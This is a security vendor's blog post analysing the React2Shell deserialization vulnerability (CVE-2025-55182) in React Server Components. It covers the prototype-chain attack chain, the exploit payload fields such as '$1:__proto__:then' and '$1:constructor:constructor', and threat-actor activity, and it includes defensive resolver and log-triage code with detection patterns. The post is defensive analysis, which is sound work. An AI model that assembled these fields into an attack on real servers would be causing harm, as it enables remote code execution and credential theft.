React2Shell: How a Trusted Framework Became a Nation-State Attack Vector

In early December 2025, a critical vulnerability came to light in which crafted React Server Components (RSC) payloads, sent to server component endpoints, achieve arbitrary code execution. The vulnerability was aptly named “React2Shell” (React-to-Shell). Once the exploit became public, security teams at major firms observed rapid exploitation in the wild by state-linked actors and other malicious third parties. Within hours, public Proof-of-Concepts and even toolkits appeared. Defenders responded layer by layer, publishing scanners, WAF signatures to identify the exploit, and patches.

The following packages were affected by the vulnerability:

  • react-server
  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-esm

At its core, React2Shell is an insecure deserialization path that allows unauthenticated attackers to send RSC payloads to a server and gain shell access via Remote Code Execution (RCE). The vulnerability resides in the React Flight protocol, which carries data between RSC and the client.

The root cause is insufficient validation of these RSC payloads, followed by unsafe processing of the deserialized structure, which lets an attacker craft payloads that invoke server-side functionality with the web server’s privileges. The vulnerability was scored as Critical and affected many Next.js deployments; because so many websites rely on Next.js, the risk was magnified further.

React2Shell was discovered by security researcher Lachlan Davidson, who disclosed it to Meta’s React team on November 29, 2025.

The Meta and Vercel teams released a public advisory on December 3, 2025, noting that the issue had been responsibly reported in late November. Security vendors and cloud providers used this advisory for root cause analysis, which led them to create detection tools and signatures against the exploit. Hours after the advisory was published, heavy scanning and exploitation attempts were observed across the internet against websites using Next.js and similar RSC packages and integrations.

The vulnerability was then assigned its own official CVE identifier, CVE-2025-55182, and added to the Known Exploited Vulnerabilities (KEV) Catalogue due to active exploitation in the wild.

At its core, React2Shell exploits the way React Flight handles “thenable” objects: objects that behave like JavaScript Promises by exposing a ‘then’ method. React’s deserializer processes incoming chunks and, when it encounters what appears to be a thenable, resolves it as a Promise.

The following attack chain then unfolds:

  1. Prototype Chain Traversal: The attacker crafts a malicious multipart POST request containing a payload with the reference “$1:__proto__:then”. Because React’s chunk deserializer lacks proper ownership validation (specifically, a “hasOwnProperty” check), it traverses the JavaScript prototype chain up from a chunk object to “Chunk.prototype.then” – a function designed to process Promise-like objects.
  2. Forged Chunk Lifecycle: The attacker sets the chunk status to “resolved_model”, tricking React Flight into believing the data has already been fulfilled, further along in its lifecycle than it actually is. The chunk is now treated as “thenable”.
  3. Function Constructor Hijack: The malicious payload references “$1:constructor:constructor” to access the JavaScript “Function” constructor via the prototype chain. This is the equivalent of calling “new Function(attackerCode)” – a mechanism that evaluates arbitrary strings as executable JavaScript at runtime.
  4. Code Execution: The “_prefix” field within the crafted “_response” object contains the attacker’s JavaScript payload. When the deserializer resolves the fake thenable, it calls the resulting anonymous function, executing the attacker’s code with full server-side privileges.

Adding to the criticality of this exploit, the chain triggers BEFORE any action ID validation occurs, so the value of the “Next-Action” header is irrelevant: any value present will reach the vulnerable code path.

It should be noted that this vulnerability is NOT a client-side XSS issue. The attack specifically targets the server-side processing of RSC, and the result is code execution on the server.
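The missing ownership check at the heart of the chain, shown as an added illustration (a toy resolver, not React’s own Flight code; the Chunk class and the “$id:segment” path syntax are simplified stand-ins). A plain property lookup follows the prototype chain, so a “__proto__” segment reaches Chunk.prototype.then; the hardened resolver accepts only own properties and rejects the same reference.

```javascript
// Added illustration, not React's own code: a toy reference resolver that
// mirrors the ownership gap described above. "Chunk" and the "$<id>:<seg>"
// path syntax are simplified stand-ins, not the real Flight implementation.
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

class Chunk {
  constructor(status, value) {
    this.status = status; // e.g. "resolved_model"
    this.value = value;
  }
  // Lives on Chunk.prototype, like the real Chunk.prototype.then.
  then(onFulfilled) {
    return onFulfilled(this.value);
  }
}

// "$1:a:b" -> { id: "1", path: ["a", "b"] }
function splitRef(ref) {
  const [id, ...path] = ref.slice(1).split(":");
  return { id, path };
}

// Vulnerable shape: a plain lookup per segment. Plain lookups consult the
// prototype chain, so "__proto__" or "constructor" walks off the chunk object.
function resolveReferenceUnsafe(chunks, ref) {
  const { id, path } = splitRef(ref);
  let target = chunks[id];
  for (const seg of path) target = target[seg];
  return target;
}

// Hardened shape: every segment must be an own property of the current
// object (the hasOwnProperty check the page names), so nothing inherited
// from a prototype is reachable through a reference.
function resolveReferenceSafe(chunks, ref) {
  const { id, path } = splitRef(ref);
  if (!hasOwn(chunks, id)) throw new Error(`unknown chunk ${id}`);
  let target = chunks[id];
  for (const seg of path) {
    if (target === null || typeof target !== "object" || !hasOwn(target, seg)) {
      throw new Error(`"${seg}" is not an own property; rejecting ${ref}`);
    }
    target = target[seg];
  }
  return target;
}

// True when the hardened resolver refuses the reference.
function isRejected(chunks, ref) {
  try { resolveReferenceSafe(chunks, ref); return false; } catch { return true; }
}

// Constructed sample: one chunk already marked resolved, as in the attack chain.
const chunks = { 1: new Chunk("resolved_model", { user: "alice" }) };
```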


Based on publicly observed exploitation attempts and Proof-of-Concepts published by researchers and analysts, the following is a breakdown of the fields that make up the exploit payload:

  • “then”: “$1:__proto__:then” – Traverses the prototype chain to reach “Chunk.prototype.then”, bypassing ownership validation.
  • “status”: “resolved_model” – Spoofs the chunk lifecycle state to trick the deserializer into treating the object as already resolved.
  • “_formData”: {“get”: “$1:constructor:constructor”} – Chains up through the constructor to access the “Function” constructor, enabling dynamic code evaluation.
  • “_prefix” – Contains the attacker’s arbitrary JavaScript payload, injected into a “Function()” call and executed on the server.

Note: In a real-world campaign, the “_prefix” field would contain a payload that exfiltrates environment variables, executes remote shell scripts and establishes persistent backdoors.

After the vulnerability was mentioned in the public advisory, threat actors began scanning for it and attempting to exploit it almost immediately.

State-sponsored activity from China-nexus threat clusters was detected attempting the React2Shell exploit. AWS threat intelligence disclosed two known groups, Earth Lamia and Jackpot Panda, as actively exploiting React2Shell alongside the China-nexus clusters. Some of the successful intrusions deployed a tunneler called “MINOCAT”, which lets the actors establish hidden directories, kill processes that would otherwise overwrite it, and create persistent cron jobs and system services to maintain a backdoor.

Popular malware campaigns were also observed, such as XMRig (a cryptomining campaign), the PeerBlight backdoor, CowTunnel and ZinFoq.

Wiz researchers observed a high volume of post-exploitation pivoting aimed at credential harvesting, carried out by dumping environment variables and querying cloud metadata endpoints to capture IAM credentials and secrets.

The scale of the exploit also brought a rise in fake and non-functioning Proof-of-Concepts on GitHub, which caused initial confusion about detection coverage and scope. Vulnerable organizations had to validate exploit code against trusted sources before building their defensive posture, both to prevent false positives and to avoid letting legitimate threats through.

  1. Organizations are urged to update all vulnerable React packages to the latest version swiftly: for React, 19.0.1, 19.1.2 or 19.2.1+, and for Next.js, 15.3.2 or 16.0.6+.
  2. WAF rules are to be deployed to block incoming requests containing pollution indicators, such as POST bodies containing “__proto__” or “constructor:constructor”, or abnormal use of the Next-Action or rsc-action-id headers.
  3. Even organizations that do not appear to be affected should assume a breached posture and conduct a forensic review of server logs for breach symptoms such as unexpected processes spawning, outbound connections to non-standard IP addresses and ports, file creation in temporary directories, or unauthorized cron jobs or system services.
  4. Exposed secrets and credentials, including IAM credentials, API keys and database connection strings, are to be rotated immediately.
  5. Actively monitor for ongoing exploit activity: requests whose User-Agent is associated with known React2Shell scanners or is tagged with CVE-2025-55182.

  1. RSC server processes must follow the principle of least privilege, with minimum OS and cloud permissions. Non-root execution and restrictive security contexts should be enforced on containerized workloads to limit post-exploitation impact.
  2. Runtime security tools are to be deployed to detect anomalous behaviour such as shells spawned from web server processes, unexpected network connections, or file system writes in sensitive or temporary paths.
  3. Organizations need to invest in a Software Bill of Materials (SBOM) tool to ensure efficient security communication between vendor and supplier / customer.
  4. Validate Proof-of-Concepts against trusted sources so that defensive controls, such as WAF rules, detections and least-privilege architectures, can be set up accurately while eliminating as many false positives as possible.
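A log triage pass for the indicators named in the recommendations above, added here as an example and not taken from the advisory or any vendor scanner. It assumes JSON-lines request records with method, headers and body fields (constructed here), and the severity ranking is an assumption of the example.

```javascript
// Added example, not from the advisory or any vendor's scanner: a triage pass
// over constructed JSON-lines request records that flags the indicators the
// recommendations above name. The record shape is an assumption.
function header(record, name) {
  const headers = record.headers || {};
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? "" : String(headers[key]);
}
const INDICATORS = [
  { name: "proto_reference", test: (r) => /__proto__/.test(r.body || "") },
  { name: "constructor_chain", test: (r) => /constructor:constructor/.test(r.body || "") },
  { name: "rsc_action_header",
    test: (r) => header(r, "next-action") !== "" || header(r, "rsc-action-id") !== "" },
  { name: "cve_tagged_user_agent", test: (r) => /CVE-2025-55182/i.test(header(r, "user-agent")) },
];

// Names of every indicator that matches one parsed record.
function triageRequest(record) {
  return INDICATORS.filter((i) => i.test(record)).map((i) => i.name);
}

// Ranking is an assumption for this example: body indicators on a POST are the
// strongest signal; since the chain fires before action-ID validation, an action
// header alone is only a weak hint; a CVE tag in the User-Agent marks scanning.
function severity(indicators, record) {
  const bodyHit = indicators.includes("proto_reference") || indicators.includes("constructor_chain");
  if (bodyHit && record.method === "POST") return "high";
  if (bodyHit || indicators.includes("cve_tagged_user_agent")) return "medium";
  return indicators.length > 0 ? "low" : "none";
}

// Parses JSON lines and keeps only records that warrant analyst attention.
function triageLog(text) {
  return text.split("\n").filter(Boolean).map((line) => {
    const record = JSON.parse(line);
    const indicators = triageRequest(record);
    return { id: record.id, severity: severity(indicators, record), indicators };
  }).filter((r) => r.severity !== "none");
}

// Constructed sample records; the body fragments only echo the indicator
// strings listed above and are not a working payload.
const SAMPLE_LOG = [
  '{"id":1,"method":"POST","path":"/contact","headers":{"User-Agent":"Mozilla/5.0"},"body":"name=alice&msg=hi"}',
  '{"id":2,"method":"POST","path":"/","headers":{"Next-Action":"x","Content-Type":"multipart/form-data"},"body":"then=$1:__proto__:then&get=$1:constructor:constructor"}',
  '{"id":3,"method":"GET","path":"/","headers":{"User-Agent":"scanner/1.0 CVE-2025-55182"},"body":""}',
  '{"id":4,"method":"POST","path":"/","headers":{"rsc-action-id":"abc"},"body":"a=1"}',
].join("\n");
```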


The sudden impact of the React2Shell exploit is a sobering reminder that foundational frameworks, deployed at large scale and trusted implicitly, can carry maximum-severity vulnerabilities. The speed with which threat actors of every kind, from state-linked groups to individuals, rushed to exploit it highlights how narrow the window between public disclosure and mass exploitation has become. For organizations that were exploited or at risk of exploitation, this scenario has been an opportunity to investigate and mature their security operations, train them around dependency management, test their rapid patching capability, and treat the episode as a remediation exercise.


Need strategic guidance on preparing your business for emerging cyber threats?
At QuasarCyberTech, our specialized cybersecurity solutions help organizations stay ahead of evolving risks. From Vulnerability Assessment and Penetration Testing (VAPT) to Security Operations Center (SOC) implementation, Red Team exercises, and Governance, Risk, and Compliance (GRC) frameworks, we provide the expertise and tools needed to secure your digital assets and infrastructure.

Contact us today to develop a customized security strategy for your organization.

References:
Github (assetnote/react2shell-scanner)
Google Cloud / GTIG
Amazon Web Services Security Blog
Sysdig
Microsoft Security Blog
Huntress
react2shell.com (Lachlan Davidson)

© 2024 Quasar CyberTech Pvt Ltd | All Rights Reserved